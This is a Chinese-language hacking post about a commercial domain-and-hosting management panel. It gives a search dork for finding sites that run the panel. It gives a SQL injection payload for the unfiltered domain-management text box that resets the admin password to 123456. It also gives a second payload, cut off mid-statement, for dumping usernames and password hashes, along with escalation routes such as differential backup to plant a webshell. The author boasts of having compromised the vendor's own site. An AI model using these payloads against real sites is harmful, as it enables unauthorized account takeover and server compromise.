这是一个域名主机实时管理系统
在百度搜索:title:(域名主机实时管理系统),会找到大量采用这种系统的网站
就是在线开通ftp
web的一个管理系统
一套web程序
和IIS管理程序
实现在线开通的玩意
所以:我们可以免费申请域名和空间
web程序方面写的非常严谨
由于是商业版的程序,所以我没有源码
本来是有的,但是放在家里的电脑上
放暑假时搞的shell现在都被删了
我现在又比较懒,就没去弄源代码
反正大家知道怎么弄的就行了
这又是一个文本框的注射
我真不知道作者是怎么想的
其他地方都被过滤了
就留下域名管理这里没过滤
官方放暑假的时候就被我搞了一遍,过了一个月他发现了
删了我的shell
不知道他怎么知道我从那里下的手搞的他
他居然补了漏洞
先上图,再说下利用方法
123'UPDATE[memlst]SETu_pss='e10adc3949ba59abbe56e057f20f883e'WHEREu_nme='admin'--这一句是把用户admin的密码修改为123456
管理员的后台地址一般是http://www
com/master或者直接在首页登陆了按切换到管理员后台
如果admin不是超级管理员,那就有三个办法
一是自己构造语句爆出来
二是提升自己注册的用户的权限
三是直接爆网站路径,再来个差异备份
第一个方法我给出一条示范语句:123'and(selecttop1isnull(cast([u_nme]asnvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss]asnvarchar(4000)),char(32))from(selecttop2u_nme,U_pssfrom[hzhost]